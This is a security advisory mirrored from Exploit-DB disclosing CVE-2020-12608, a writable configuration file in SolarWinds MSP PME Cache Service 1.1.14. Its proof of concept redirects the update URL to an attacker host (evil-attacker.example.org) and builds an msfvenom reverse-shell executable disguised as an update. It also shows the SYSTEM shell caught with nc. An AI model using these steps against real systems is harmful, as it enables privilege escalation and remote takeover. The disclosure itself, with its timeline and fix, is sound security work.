SolarWinds MSP PME Cache Service 1.1.14 – Insecure File Permissions

• Exploit Database
• 14 阅读

• 作者： Jens Regel
  日期： 2020-05-11
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48448/

• # Title: SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions
  # Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
  # Date: 2020-05-06
  # Vendor: https://www.solarwindsmsp.com/
  # CVE: CVE-2020-12608
  # GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608
  # CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]
  # CWE: 276
  
  Vulnerable version
  ==================
  SolarWinds MSP PME (Patch Management Engine) before 1.1.15
  
  Timeline
  ========
  2020-04-24 Vulnerability discovered
  2020-04-27 Send details to SolarWinds PSIRT
  2020-04-27 SolarWinds confirmed the vulnerability
  2020-05-05 SolarWinds released PME version 1.1.15
  2020-05-06 Public disclosure
  
  Description
  ===========
  An error with insecure file permissions has occurred in the SolarWinds
  MSP Cache Service, which is part of the Advanced Monitoring Agent and
  can lead to code execution. The SolarWinds MSP Cache Service is
  typically used to get new update definition files and versions for
  ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The
  XML file CacheService.xml in %PROGRAMDATA%\SolarWinds
  MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so
  that the parameter SISServerURL can be changed, which controls the
  location of the updates. After some analysis, we were able to provide
  modified XML files (PMESetup_details.xml and
  ThirdPartyPatch_details.xml) that point to an executable file with a
  reverse TCP payload using our controlled SISServerURL web server for
  SolarWinds MSP Cache Service.
  
  Proof of Concept (PoC)
  ======================
  As we can see, NTFS change permissions are set to CacheService.xml by
  default. Any user on the system who is in group users can change the
  file content. This is especially a big problem on terminal servers or
  multi-user systems.
  
  PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config>
  icacls .\CacheService.xml
  .\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
  NT-AUTORITÄT\SYSTEM:(I)(F)
  VORDEFINIERT\Administratoren:(I)(F)
  
  1. Modify CacheService.xml
  
  In the xml file, the parameter SISServerURL was adjusted, which now
  points to a web server controlled by the attacker.
  
  <?xml version="1.0" encoding="utf-8"?>
  <Configuration>
  <CachingEnabled>True</CachingEnabled>
  <ApplianceVersion>1.1.14.2223</ApplianceVersion>
  <CacheLocation>C:\ProgramData\SolarWinds
  MSP\SolarWinds.MSP.CacheService\cache</CacheLocation>
  <CacheSizeInMB>10240</CacheSizeInMB>
  <SISServerURL>https://evil-attacker.example.org</SISServerURL>
  <LogLevel>5</LogLevel>
  <Proxy></Proxy>
  <ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt>
  <ProxyCacheService />
  <CacheFilesDeleted></CacheFilesDeleted>
  <CacheDeletedInBytes></CacheDeletedInBytes>
  <HostApplication>RMM</HostApplication>
  <CanBypassProxyCacheService>True</CanBypassProxyCacheService>
  <BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds>
  <ComponentUpdateMinutes>300</ComponentUpdateMinutes>
  <ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds>
  </Configuration>
  
  2. Payload creation
  
  Generate an executable file, for example using msfvenom, that
  establishes a reverse tcp connection to the attacker and store it on the
  web server.
  
  msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f
  exe > /tmp/solarwinds-shell.exe
  
  3. Prepare web server
  
  Place the modified xml files (PMESetup_details.xml or
  ThirdPartyPatch_details.xml) on the web server in the path
  /ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the
  executable, set correct values for SizeInBytes and increase the version.
  
  Example of PMESetup_details.xml
  
  <ComponentDetails>
  <Name>Patch Management Engine</Name>
  <Description>Patch Management Engine</Description>
  <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
  <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
  <SHA256Checksum>
  80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
  </SHA256Checksum>
  <SizeInBytes>7168</SizeInBytes>
  <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
  <FileName>solarwinds-shell.exe</FileName>
  <Architecture>x86,x64</Architecture>
  <Locale>all</Locale>
  <Version>1.1.14.2224</Version>
  </ComponentDetails>
  
  Example of ThirdPartyPatch_details.xml
  
  <ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Name>Third Party Patch</Name>
  <Description>
  Third Party Patch application for Patch Management Engine RMM v 1 and later
  </Description>
  <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
  <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
  <SHA256Checksum>
  80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
  </SHA256Checksum>
  <SizeInBytes>7168</SizeInBytes>
  <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
  <FileName>solarwinds-shell.exe</FileName>
  <Architecture>x86,x64</Architecture>
  <Locale>all</Locale>
  <Version>1.2.1.95</Version>
  </ComponentDetails>
  
  4. Malicious executable download
  
  After restarting the system or reloading the CacheService.xml, the
  service connects to the web server controlled by the attacker and
  downloads the executable file. This is then stored in the path
  %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and
  %PROGRAMDATA%\SolarWinds MSP\PME\archives\.
  
  [24/Apr/2020:10:57:01 +0200] "HEAD
  /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"
  [24/Apr/2020:10:57:01 +0200] "GET
  /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"
  
  5. Getting shell
  
  After a certain time the executable file is executed by SolarWinds MSP
  RPC Server service and establishes a connection with the rights of the
  system user to the attacker.
  
  [~]: nc -nlvp 4444
  Listening on [0.0.0.0] (family 0, port 4444)
  Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
  Microsoft Windows [Version 10.0.18363.778]
  (c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.
  
  C:\WINDOWS\system32>whoami
  whoami
  nt-authority\system
  
  C:\WINDOWS\system32>
  
  Fix
  ===
  There is a new PME version 1.1.15 which comes with auto-update
  https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/